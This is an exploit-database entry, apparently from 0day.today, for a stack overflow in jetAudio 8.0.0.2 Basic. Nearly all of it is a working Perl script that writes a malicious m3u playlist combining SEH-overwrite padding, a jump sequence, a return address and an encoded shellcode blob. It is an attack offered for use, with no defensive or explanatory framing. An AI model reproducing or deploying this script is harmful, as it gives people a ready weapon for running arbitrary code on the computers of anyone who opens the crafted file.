jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit

2010-01-21T00:00:00
ID 1337DAY-ID-10148
Type zdt
Reporter cr4wl3r
Modified 2010-01-21T00:00:00

Description

Exploit for unknown platform in category local exploits

                                        
                                            ===================================================
jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit
===================================================


#!/usr/bin/perl
# Title: jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit
# Author: cr4wl3r
# Tested: Windows xp(sp2)
#########################################
 
my $file="b00m.m3u";
 
my $header = "http://";
my $junk = "A" x 1017;
my $nseh = "\xeb\x06\x90\x90"; 
my $seh = pack('V',0x01221045);
 
my $shellcode =
"\x33\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13".
"\xA8\x45\xF5\xB8\x83\xEB\xFC\xE2\xF4\x54\x2F\x1E\xF5\x40\xBC".
"\x0A\x47\x57\x25\x7E\xD4\x8C\x61\x7E\xFD\x94\xCE\x89\xBD\xD0".
"\x44\x1A\x33\xE7\x5D\x7E\xE7\x88\x44\x1E\xF1\x23\x71\x7E\xB9".
"\x46\x74\x35\x21\x04\xC1\x35\xCC\xAF\x84\x3F\xB5\xA9\x87\x1E".
"\x4C\x93\x11\xD1\x90\xDD\xA0\x7E\xE7\x8C\x44\x1E\xDE\x23\x49".
"\xBE\x33\xF7\x59\xF4\x53\xAB\x69\x7E\x31\xC4\x61\xE9\xD9\x6B".
"\x74\x2E\xDC\x23\x06\xC5\x33\xE8\x49\x7E\xC8\xB4\xE8\x7E\xF8".
"\xA0\x1B\x9D\x36\xE6\x4B\x19\xE8\x57\x93\x93\xEB\xCE\x2D\xC6".
"\x8A\xC0\x32\x86\x8A\xF7\x11\x0A\x68\xC0\x8E\x18\x44\x93\x15".
"\x0A\x6E\xF7\xCC\x10\xDE\x29\xA8\xFD\xBA\xFD\x2F\xF7\x47\x78".
"\x2D\x2C\xB1\x5D\xE8\xA2\x47\x7E\x16\xA6\xEB\xFB\x16\xB6\xEB".
"\xEB\x16\x0A\x68\xCE\x2D\x35\xB8\xCE\x16\x7C\x59\x3D\x2D\x51".
"\xA2\xD8\x82\xA2\x47\x7E\x2F\xE5\xE9\xFD\xBA\x25\xD0\x0C\xE8".
"\xDB\x51\xFF\xBA\x23\xEB\xFD\xBA\x25\xD0\x4D\x0C\x73\xF1\xFF".
"\xBA\x23\xE8\xFC\x11\xA0\x47\x78\xD6\x9D\x5F\xD1\x83\x8C\xEF".
"\x57\x93\xA0\x47\x78\x23\x9F\xDC\xCE\x2D\x96\xD5\x21\xA0\x9F".
"\xE8\xF1\x6C\x39\x31\x4F\x2F\xB1\x31\x4A\x74\x35\x4B\x02\xBB".
"\xB7\x95\x56\x07\xD9\x2B\x25\x3F\xCD\x13\x03\xEE\x9D\xCA\x56".
"\xF6\xE3\x47\xDD\x01\x0A\x6E\xF3\x12\xA7\xE9\xF9\x14\x9F\xB9".
"\xF9\x14\xA0\xE9\x57\x95\x9D\x15\x71\x40\x3B\xEB\x57\x93\x9F".
"\x47\x57\x72\x0A\x68\x23\x12\x09\x3B\x6C\x21\x0A\x6E\xFA\xBA".
"\x25\xD0\x47\x8B\x15\xD8\xFB\xBA\x23\x47\x78\x45\xF5\xB8";
 
 
my $footer="E" x (2000-length(junk.nseh.seh.shellcode));
 
my $payload = $header.$junk.$nseh.$seh.$shellcode.$footer;
 
print " Writing payload to file\n";
 
open(sploitf,">$file");
print sploitf $payload;
close(sploitf);
print " Exploit file " . b00m . " created\n";
print " b00m " . length($payload) . " bytes\n";



#  0day.today [2018-04-03]  #